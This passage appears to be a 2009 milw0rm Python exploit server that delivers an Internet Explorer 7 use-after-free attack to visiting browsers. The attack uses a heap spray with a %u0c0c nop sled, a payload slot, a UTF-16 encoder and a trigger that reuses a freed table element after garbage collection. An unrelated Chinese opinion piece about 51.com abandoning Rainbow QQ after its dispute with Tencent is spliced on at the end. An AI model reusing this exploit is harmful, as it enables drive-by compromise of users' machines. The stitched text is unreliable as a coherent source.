            var heap_chunk_size = 0x40000;
            
            var nopsled_size = heap_chunk_size - (payload.length * 2)
            var nopsled = unescape("%u0c0c%u0c0c");
            while (nopsled.length < nopsled_size)
                nopsled += nopsled;
                 
            heap_chunks = new Array();
            heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
            for (var i = 0 ; i < heap_chunks_num ; i++)
                heap_chunks[i] = nopsled + payload;
        }
                
        function trigger_bug() 
        {
            var obj = document.createElement("table");
            obj.click;
            
            var obj_cp = obj.cloneNode();
            obj.clearAttributes();
            obj = null;
            
            CollectGarbage();
           
            var img = document.createElement("img");
            img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");
          
          obj_cp.click;
        }
        
        if (navigator.userAgent.indexOf("MSIE 7") != -1) {
            spray_heap();
            trigger_bug()       
        } else
            window.location = "about:blank"
       
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = '<html><body><script>' + exploit + '</script></body></html>'
        return exploit

    def convert_to_utf16(self, payload):
        # From Beta v2.0 by Berend-Jan Wever
        # http://www.milw0rm.com/exploits/656
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            
for j in range(0, 2):
                num += (ord(payload[i+j]) & 0xff) << (j*8)
            enc_payload += '%%u%04x' % num
        return enc_payload
            
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        print '[-] Incoming connection from %s' % self.client_address[0]
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        print '[-] Sending exploit to %s ...' % self.client_address[0],
        self.wfile.write(self.get_exploit())
        print 'done'

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    port = None
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
    try:
        serv = HTTPServer(('', port), RequestHandler)
        ip = socket.gethostbyname(socket.gethostname())
        print '[-] Web server is running at http://%s:%d/' % (ip, port)
    except socket.error:
        print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)
    try:
        serv.serve_forever()
    except KeyboardInterrupt:
        print '[-] Exiting ...' 
            
if __name__ == '__main__':
    main()

# milw0rm.com [2009-03-04]


以下文字转自cnbeta

新闻来源:人民网-IT频道
51.com和腾讯就彩虹QQ而起的纠纷终于告一段落。17日，51.com董事长兼CEO庞升东表示“不打算继续做彩虹QQ”。在月初51.com和腾讯的口水战中，51.com曾在彩虹QQ官方论坛中表示“如果用户不放弃彩虹，彩虹就会一直走下去”。（12月18日新京报）本来以为51.com和腾讯会在法庭上大战一番的，不单是我，绝大多数的彩虹拥趸肯定也是这样想的，谁知道51.com却不战而退，这着实让很多对彩虹QQ抱有获胜希望或者希望二者能够合作的人大失所望。

不管怎样，彩虹QQ也算一个山寨品牌，它消失了，我没法子祝它一路走好，只能对它说一句：彩虹QQ，再见！

不必寄希望于 51.com会推出什么彩虹牌子的聊天软件，因为现在的庞升东无非是一个拥有51.com不菲股份的高级打工者，51.com在事实上是史玉柱的，而史玉 柱的智商明显要比庞高许多，不会傻到和马化腾打官司的地步，否则史玉柱也不会有今天。史玉柱控制51的目标是游戏社区化，而不是成本和风险更大的聊天软 件。所有替彩虹呼吁的人暂时都可以休息了，因为连彩虹研发部门都没有了。

我只能说史玉柱明智，因为如果没有他的意思，我很难想象51.com会有今天的举动。走上法庭无疑对51.com更加不利，骂腾讯抄袭的人应该更清楚QQ名字的由来，如果没有版权之争，会有今天“QQ”这个标志吗？所以彩虹QQ这个名字从法律意义上很难存在。

自从腾讯封杀彩虹以来，很多人说我是腾讯的枪手，但事情的结局证明我说的是对的，最起码有一定的道理，不然怎么会有彩虹的退出呢 ？金融危机的确是一个借口，可法律的瓶颈却是最大的难题。

我们无法否认当年的腾讯是个幸运儿，放在今天，腾讯也许会死，但彩虹就不可能有那么幸运了。腾讯有经验，卧榻之侧岂容他人鼾睡，那些想让两者合作的人天 真的程度让我想笑。将来彩虹或许只能和番茄花园一样成为一个历史名词，它甚至连珊瑚虫都不如，珊瑚虫的支持者尚且可以建立网站声援珊瑚虫，而彩虹却是遗弃 者，二者有本质的不同的。彩虹的支持者可以呼吁抵制QQ吗？我不相信。未来彩虹的支持者会掀起什么风暴呢？

彩虹很美，但终究会消散；彩虹QQ只是一个梦，终归会醒。无论你说我什么，反正庞升东已经举起了白旗。这次没有打起来的战役是史玉柱东山再起之后少有的失利，也许史玉柱会向腾讯发起下一步攻击，但武器绝对不是彩虹，战场也不会是聊天软件市场。

彩虹QQ，再见！我不说你一路走好，因为你已无路可走。

支持史玉柱！反对霸权的腾讯！

谨以此文做为彩虹QQ的祭文。

PS:强人一个！